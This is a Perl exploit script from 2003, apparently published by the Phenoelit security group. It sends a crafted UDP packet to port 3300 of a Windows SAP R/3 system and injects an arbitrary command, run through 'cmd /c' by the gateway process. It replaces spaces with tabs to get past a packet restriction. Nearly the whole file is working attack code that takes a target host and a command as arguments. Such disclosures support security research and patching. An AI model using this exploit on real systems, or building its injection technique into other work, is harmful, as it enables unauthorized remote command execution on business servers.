r3mote_win_UDPexec.pl.txt

`#!/usr/bin/perl -w  
use IO::Socket;  
  
#  
# Executes the command given as first argument as a child process of   
# gwrd in Windows R/3 environments. Request packet may not contain space  
# character (0x20). The command interpreter must obviously be modified   
# for other (UNIX) environments.  
#  
# 2003, FX of Phenoelit <[email protected]>  
#  
  
$|=1;  
  
# MSDN documentation of CreateProcess() :  
# http://msdn.microsoft.com/library/en-us/dllproc/base/createprocess.asp  
  
die "Give command" unless ($command=shift);  
die "Give host" unless ($host=shift);  
$port="3300" unless ($port=shift);  
  
$command=~s/ /\x09/g;  
  
$request =   
"\x01".  
"\x02".  
"\x41\x42\x43".  
"\x01".  
"\x20".  
"\x00\x00\x00".  
"\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50".  
"\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51".  
"\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52".  
"\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53".  
"\x54\x54\x09\x09\x09\x09\x09\x09\x09\x09".  
"A\x09\x09\x09\x09\x09\x09\x09\x09".  
"AAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00\x00\x00".  
# Command to be injected, must end with && since 0x00   
# termination does not work here  
"cmd\x09/c\x09(".$command.")\x09"."&&".  
"";  
  
  
&send_UDP($host,$port);  
  
exit 0;  
  
sub send_UDP {  
my $remote;  
my $rline;  
my $dest;  
my $port;  
  
($dest,$port) = @_;  
  
$remote =  
IO::Socket::INET->new(Proto=>"udp",PeerAddr=>$dest,PeerPort=>"$port",);  
unless ($remote) { die "cannot get socket for $dest" }  
$remote->autoflush(1);  
print $remote $request;  
  
close $remote;  
}  
`